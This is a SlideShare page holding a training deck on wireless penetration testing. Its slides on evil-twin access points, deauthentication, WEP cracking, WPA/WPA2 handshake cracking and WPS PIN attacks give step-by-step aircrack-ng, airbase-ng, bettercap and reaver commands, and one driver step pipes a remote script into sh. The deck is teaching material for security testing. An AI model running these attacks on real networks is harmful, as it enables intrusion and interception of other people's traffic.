SlideShare a Scribd company logo

Wireless Penetration Testing

Download as PPTX, PDF
Mohammed Adam
Mohammed Adam

In this slides deck, we gonna look into Wireless penetration testing requirements like hardware & software, Various IEEE standards. and also deep dive into WEP, WPA, WPA2 & its Security threats & Security best practices.

Technology
1 of 62
Wireless Penetration Testing
Agenda WIRELESS PENETRATION TESTING • Lab Setup • Wi-Fi Network Fundamentals • Wireless Packets • Wi-Fi Network Interaction • Wireless Reconnaissance • Rogue Access points • Cracking WEP • Cracking WPA/WPA2 • WPS Attacks • Security Best Practices
Lab Setup Hardware requirements • TP-Link WN722N • Alfa AWUS036H • Melon RTL8187L • Alfa AWUS036NHA • Panda PAU05 • Alfa AWUS036NEH
Hardware of my choice for this session: TL-WN722N Wi-Fi Adaptor
System Architecture • Minimum System Configuration • Windows 10 in Host Machine • Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2CPU • Virtualisation Platform • Virtual box (https://www.virtualbox.org/) (or) • VMware (https://www.vmware.com/in/products/workstation- player/workstation-player-evaluation.html) • OS needs to be installed inside VM • Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
Software Requirements • Aircrack-ng • Wifite • Bettercap • Johntheripper • Hashcat • coWPATTY • Kismet • Fluxion • Wi-Fi-Pumpkin
Wi-Fi Network Fundamentals IEEE 802.11 • IEEE 802.11 is part of the IEEE 802 set of local area network (LAN) technical standards, and specifies the set of media access control (MAC) and physical layer (PHY) protocols for implementing wireless local area network (WLAN) computer communication. • The standard and amendments provide the basis for wireless network products using the Wi-Fi brand and are the world's most widely used wireless computer networking standards. • IEEE 802.11 is used in most home and office networks to allow laptops, printers, smartphones, and other devices to communicate with each other and access the Internet without connecting wires. IEEE 802.11 is also a basis for vehicle-based communication networks with IEEE 802.11p.
IEEE 802.11 (Contd.) • The standards are created and maintained by the Institute of Electrical and Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802). • The base version of the standard was released in 1997 and has had subsequent amendments. While each amendment is officially revoked when it is incorporated in the latest version of the standard, the corporate world tends to market to the revisions because they concisely denote the capabilities of their products. • IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz, 5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications list channels that might be used, the radio frequency spectrum availability allowed varies significantly by regulatory domain. • The protocols are typically used in conjunction with IEEE 802.2, and are designed to interwork seamlessly with Ethernet, and are very often used to carry Internet Protocol traffic.
Standards and Amendments
Standards and Amendments(Contd.)
In Process Standards
Wireless Lan: 802.11 Standards Comparison Wi-Fi 7 Expected to Launch in second half of 2024, Currently we are using Wi-Fi 6
Basic Terminologies
Basic Terminologies(Contd.) Access Point (AP) • AP is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. • As a standalone device, the AP may have a wired connection to a router, but, in a wireless router, it can also be an integral component of the router itself. Service Set Identifier (SSID) • A service set identifier (SSID) is a sequence of characters that uniquely names a wireless local area network (WLAN). • An SSID is sometimes referred to as a "network name" This name allows stations to connect to the desired network when multiple independent networks operate in the same physical area.
Basic Terminologies(Contd.) Basic Service Set Identifier (BSSID) • Its the MAC physical address of the access point or wireless router that is used to connect to the Wi-Fi. Extended Service Set Identifier (ESSID) • It is a wireless network, created by multiple access points, which appears to users as a single, seamless network, such as a network covering a home or office that is too large for reliable coverage by a single access point. Roaming • Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and connects to a different one.
Basic Terminologies(Contd.) Channel • A Wi-Fi channel is the frequency at which your router sends out the information to your device. Most routers and devices support several bands for your Wi-Fi connection, most popular being 5 GHz and 2.4 GHz. Each of these ranges gets divided into smaller slots that are channels. Data Rate • Data rates varying modulation types and number of spatial streams; 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps, 867 Mbps. Beacon • Wi-Fi beacons are relatively short, regular transmissions from access points (APs) with a purpose to inform user devices (clients) about available Wi-Fi services and near-by access points. Clients use beacons to decide which AP with which to connect.
Wireless Operating modes
Wireless Operating modes (Contd.) • Managed - Managed mode allows you to configure your laptop or desktop system as an AP for providing connectivity to other wireless stations. • Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices can communicate directly with each other. This type of wireless network is also called peer-to-peer mode. • Master - When your wireless card is in master mode it acts as an access point and it actively transmits a signal • Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. • Auto - the easiest way to configure a wireless interface and is enabled by default
TP-Link TL-WN722N Driver Software installation: • Sudo apt update • Sudo apt upgrade • Sudo apt dist-upgrade • Sudo reboot • Sudo apt install bc • Sudo apt get install build-essential • Sudo apt-get install libelf-dev • Sudo apt install linux-headers-amd64 • Echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf" • Reboot • Git clone https://github.com/aircrack-ng/rtl8188eus • Cd rtl8188eus • sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"
Monitor Mode • Start the Kali OS in VMware or Virtual box • Plug-in USB Tplink Wireless Adapter (TL-WN722N) • Run following command • iwconfig
Monitor Mode(Contd.) • By default it will be in Auto or Managed mode • Run following commands to switch to Monitor mode • Airmon-ng start wlan0 • Airmon-ng check kill [if any previous processes are running do this] • iwconfig • To Disable monitor mode run airmon-ng stop wlan0 • Restart network manager – service network-manager start
Monitor Mode(Contd.)
Wireless Packets – IEEE 802.11 Mac Frame Structure
Wireless Packet Types
Analyzing Packets using Wireshark
Wi-Fi Network Interaction
Wi-Fi Authentication Methods
Wireless Encryption Protocols (WEP/WPA/WPA2)
WPA2 Authentication & Keys
WPA2 Personal and Enterprise
WPS (Wi-Fi Protected Setup)
Authentication
Wireless Reconnaissance • Tools required: Bettercap, airodump-ng & Kismet • In Bettercap, run following commands • Choose interface before, bettercap --iface wlan0 • Help wifi • Wifi.recon on • Wifi.show • Wifi.recon off
Wireless Reconnaissance with Bettercap
Wardriving with Kismet (Just for reference) • This can be achieved only, if we are moving or driving or roaming in a vehicle from multiple location to capture Wi-Fi hotspots with GPS Information. • Hardware required - Car, Laptop, Android Phone, Wifi Adapter • Software Required – Kismet, GPSD, ADB, Share GPS (AndroidApp), Google Earth • Reference blog link - https://veteransec.org/wifi-hacking-wardriving- with-an-android-phone-and-raspberry-pi-3/
Wardriving with WiGLE
Wireless Reconnaissance with Airodump-ng
Rogue Access points requirements • Tools Required: airodump-ng, airbase-ng, airmon-ng and Wi-Fi- pumpkin 3 • Wi-Fi pumpkin 3 installation • Git clone https://github.com/P0cL4bs/wifipumpkin3 • https://wifipumpkin3.github.io/docs/getting-started#installation • DNSmasq • apt-get install dnsmasq -y
Creation of Rogue AP using Wi-Fi Pumpkin 3 • Plugin wireless adapter & It doesn’t required monitor mode enabled. Run following commands • Wifipumpkin3 • Set interface wlan0 • Set ssid hello • Set proxy noproxy • Start • It will create an Rogue AP with Name With name Hello
Creation of Rogue AP using Wi-Fi Pumpkin 3 (Contd.) • Once any device is connected to Rogue AP “Hello” we can intercept the traffic of connected clients easily. (Eviltwin attack)
Creation of Rogue AP using Air-ng tools • Airodump-ng wlan0 • Airbase-ng -c 11 –e tplink –s –W 1 wlan0 • Airodump-ng –c 11 --bssid bssidoftplinknewlycreated –w 1 wlan0 • For Eviltwin/MITM attack we need DNSmasq • airbase-ng -e TP-Link -c 8 wlan0 [create fake ap for eviltwinattack] • at0 interface is created geany /etc/dnsmasq.conf interface=at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1
Creation of Rogue AP using Air-ng tools (Contd.) Run below commands in separate terminal • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with any device now, we can see the traffic
Sniffing with Dnsmasq
Cracking WEP Create a rogue access point with WEP Cipher • Airbase-ng –c 11 –e hello –w 31:32:33:34:35 wlan0 Use the same Dnsmasq config here • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with device with WEP Fake AP • Airodump-ng wlan0 [ to check whether the fake ap is Up or not]
Cracking WEP(Contd.) • DeAuthentication attack with aireplay-ng • Aireplay-ng --deauth 0 –a macaddressoffakeAP –c macaddressofclientconnected wlan0 • DeAuthentication attack with bettercap • Bettercap --iface wlan0 • Wifi.recon on & wifi.show • Wifi.deauth macaddressoffakeAP • Macchanger • Ifconfig wlan0 down • Macchanger –r wlan0 • Ifconfig wlan0 up
Cracking WEP(Contd.) • Airdump-ng to dump the wep.cap file • airodump-ng -c 11 --bssid macaddfakeAP –w wepcrack wlan0 • Fake Authentication • Aireplay-ng --fakeauth 60 –e hello –a macaddresfakeAP –h macaddressofwlan0 wlan0 • ARP Request Replay attack • Aireplay-ng --arpreplay -e hello -a macaddfakeAP -h macaddrwlan0 wlan0 • Again perform deauth attack • Aireplay-ng --deauth 0 –a macaddfakeAP -c macaddrclientconnected wlan0 • Stop the deauth • Crack the WEP captured file using aircrack-ng • Aircrack-ng wep-cracking.cap [it will crack the WEP key]
Cracking WEP(Contd.)
Cracking WEPDUMP File using Aircrack-ng
Cracking WEP using Wifite
Cracking WPA/WPA2
Password Wordlists (Seclists)
Password Wordlists (Weakpass.com)
Password Wordlists (wiki.skullsecurity.org)
Capture the WPA/WPA2 Handshake file • Run the following commands: • airmon-ng start wlan0 [Put the wireless adapter in Monitor mode] • airodump-ng wlan0 [Listen to all the APs which are alive] • airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture wpacracking handshake file with airodump-ng] • Do a Deauthentication attack manually by disconnection/connecting your mobile device to that AP • aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt [Pass the wordlist with handshake file]
Capture the WPA/WPA2 Handshake file(Contd.)
Cracking WPA/WPA2 using John the Ripper • John --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking.cap
Cracking WPA/WPA2 using Wifite • Wifite –wpa • Before starting the attack connect with a client device
Cracking WPS
Cracking WPS (PIN attacks) • wifite --wps [Using Wifite] • reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K [Using Reaver]
Next-Gen Wireless Assessment tools Wi-Fi Pineapple
Security Best Practices • Change default passwords • Restrict access to authorized users • Encrypt the data on your network • Protect your Service Set Identifier (SSID) • Install a firewall • Maintain antivirus software • Use file sharing with caution • Keep your access point software patched and up to date • Check your internet provider’s or router manufacturer’s wireless security options • Connect using a Virtual Private Network (VPN) Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003
THANK YOU !

Recommended

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testingMohit Belwal
 
Fortigate Training
Fortigate TrainingFortigate Training
Fortigate TrainingNCS Computech Ltd.
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfSouvikRoy114738
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONBGA Cyber Security
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 
Campus_Network_Design_with_ArubaOS-CX_-_Leading_Practices
Campus_Network_Design_with_ArubaOS-CX_-_Leading_PracticesCampus_Network_Design_with_ArubaOS-CX_-_Leading_Practices
Campus_Network_Design_with_ArubaOS-CX_-_Leading_PracticesRoanVillalobos1
 

Recommended

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testingMohit Belwal
 
Fortigate Training
Fortigate TrainingFortigate Training
Fortigate TrainingNCS Computech Ltd.
 
Thick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfThick Client Penetration Testing.pdf
Thick Client Penetration Testing.pdfSouvikRoy114738
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONBGA Cyber Security
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 
Campus_Network_Design_with_ArubaOS-CX_-_Leading_Practices
Campus_Network_Design_with_ArubaOS-CX_-_Leading_PracticesCampus_Network_Design_with_ArubaOS-CX_-_Leading_Practices
Campus_Network_Design_with_ArubaOS-CX_-_Leading_PracticesRoanVillalobos1
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Temel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıTemel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıAhmet Gürel
 
Network Access Control (NAC)
Network Access Control (NAC)Network Access Control (NAC)
Network Access Control (NAC)Forescout Technologies Inc
 
Palo alto networks next generation firewalls
Palo alto networks next generation firewallsPalo alto networks next generation firewalls
Palo alto networks next generation firewallsCastleforce
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
13 palo alto url web filtering concept
13 palo alto url web filtering concept13 palo alto url web filtering concept
13 palo alto url web filtering conceptMostafa El Lathy
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Network Architecture Review Checklist
Network Architecture Review ChecklistNetwork Architecture Review Checklist
Network Architecture Review ChecklistEberly Wilson
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)Ahmed Ayman
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
AAA Implementation
AAA ImplementationAAA Implementation
AAA ImplementationAhmad El Tawil
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
PostgreSQL Security. How Do We Think?
PostgreSQL Security. How Do We Think?PostgreSQL Security. How Do We Think?
PostgreSQL Security. How Do We Think?Ohyama Masanori
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİBGA Cyber Security
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizBGA Cyber Security
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
DDoS Engelleme Ürünleri
DDoS Engelleme ÜrünleriDDoS Engelleme Ürünleri
DDoS Engelleme ÜrünleriBGA Cyber Security
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of CompromiseTomasz Jakubowski
 
Best Network Performance Monitoring Tool
Best Network Performance Monitoring ToolBest Network Performance Monitoring Tool
Best Network Performance Monitoring ToolJoe Shestak
 
Openwrt wireless
Openwrt wirelessOpenwrt wireless
Openwrt wireless晓东 杜
 
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APEmbedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APAhmed El-Arabawy
 

More Related Content

What's hot

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Temel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıTemel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıAhmet Gürel
 
Palo alto networks next generation firewalls
Palo alto networks next generation firewallsPalo alto networks next generation firewalls
Palo alto networks next generation firewallsCastleforce
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
13 palo alto url web filtering concept
13 palo alto url web filtering concept13 palo alto url web filtering concept
13 palo alto url web filtering conceptMostafa El Lathy
 
Network Architecture Review Checklist
Network Architecture Review ChecklistNetwork Architecture Review Checklist
Network Architecture Review ChecklistEberly Wilson
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)Ahmed Ayman
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
PostgreSQL Security. How Do We Think?
PostgreSQL Security. How Do We Think?PostgreSQL Security. How Do We Think?
PostgreSQL Security. How Do We Think?Ohyama Masanori
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of CompromiseTomasz Jakubowski
 
Best Network Performance Monitoring Tool
Best Network Performance Monitoring ToolBest Network Performance Monitoring Tool
Best Network Performance Monitoring ToolJoe Shestak
 

What's hot (20)

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Temel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve KomutlarıTemel Linux Kullanımı ve Komutları
Temel Linux Kullanımı ve Komutları
 
Network Access Control (NAC)
Network Access Control (NAC)Network Access Control (NAC)
Network Access Control (NAC)
 
Palo alto networks next generation firewalls
Palo alto networks next generation firewallsPalo alto networks next generation firewalls
Palo alto networks next generation firewalls
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
13 palo alto url web filtering concept
13 palo alto url web filtering concept13 palo alto url web filtering concept
13 palo alto url web filtering concept
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Framework
 
Network Architecture Review Checklist
Network Architecture Review ChecklistNetwork Architecture Review Checklist
Network Architecture Review Checklist
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
 
AAA Implementation
AAA ImplementationAAA Implementation
AAA Implementation
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
PostgreSQL Security. How Do We Think?
PostgreSQL Security. How Do We Think?PostgreSQL Security. How Do We Think?
PostgreSQL Security. How Do We Think?
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli Analiz
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
DDoS Engelleme Ürünleri
DDoS Engelleme ÜrünleriDDoS Engelleme Ürünleri
DDoS Engelleme Ürünleri
 
The Indicators of Compromise
The Indicators of CompromiseThe Indicators of Compromise
The Indicators of Compromise
 
Best Network Performance Monitoring Tool
Best Network Performance Monitoring ToolBest Network Performance Monitoring Tool
Best Network Performance Monitoring Tool
 

Similar to Wireless Penetration Testing

Openwrt wireless
Openwrt wirelessOpenwrt wireless
Openwrt wireless晓东 杜
 
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APEmbedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APAhmed El-Arabawy
 
Fudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsFudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsKiran Divekar
 
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730Netgear Italia
 
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESCENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESNazmul Hossain Rakib
 
Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)NetProtocol Xpert
 
Рекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС CiscoРекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС CiscoCisco Russia
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...Tũi Wichets
 
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld
 
WiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless RouterWiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless RouterWispot
 
Wireless lan electronics and communication engineering
Wireless lan electronics and communication engineeringWireless lan electronics and communication engineering
Wireless lan electronics and communication engineeringeceb9198
 
Finding Your Wavelength in Wireless
Finding Your Wavelength in WirelessFinding Your Wavelength in Wireless
Finding Your Wavelength in Wirelesseaze_50
 

Similar to Wireless Penetration Testing (20)

Openwrt wireless
Openwrt wirelessOpenwrt wireless
Openwrt wireless
 
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APEmbedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
 
Fudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsFudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to Internals
 
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
 
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESCENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
 
Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)
 
66 pf sensetutorial
66 pf sensetutorial66 pf sensetutorial
66 pf sensetutorial
 
66_pfSenseTutorial
66_pfSenseTutorial66_pfSenseTutorial
66_pfSenseTutorial
 
66_pfSenseTutorial
66_pfSenseTutorial66_pfSenseTutorial
66_pfSenseTutorial
 
Wi-Fi Module
Wi-Fi ModuleWi-Fi Module
Wi-Fi Module
 
2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals
 
Рекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС CiscoРекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС Cisco
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
 
Etherfast3828
Etherfast3828Etherfast3828
Etherfast3828
 
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
 
WiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless RouterWiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless Router
 
Wireless lan electronics and communication engineering
Wireless lan electronics and communication engineeringWireless lan electronics and communication engineering
Wireless lan electronics and communication engineering
 
Finding Your Wavelength in Wireless
Finding Your Wavelength in WirelessFinding Your Wavelength in Wireless
Finding Your Wavelength in Wireless
 
Process for joining to the FIWARE Lab
Process for joining to the FIWARE LabProcess for joining to the FIWARE Lab
Process for joining to the FIWARE Lab
 

More from Mohammed Adam

Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Mohammed Adam
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2Mohammed Adam
 
Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Mohammed Adam
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Basic Foundation For Cybersecurity
Basic Foundation For CybersecurityBasic Foundation For Cybersecurity
Basic Foundation For CybersecurityMohammed Adam
 
Golden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceGolden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceMohammed Adam
 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profitMohammed Adam
 
Introduction to Network Fundamentals
Introduction to Network FundamentalsIntroduction to Network Fundamentals
Introduction to Network FundamentalsMohammed Adam
 
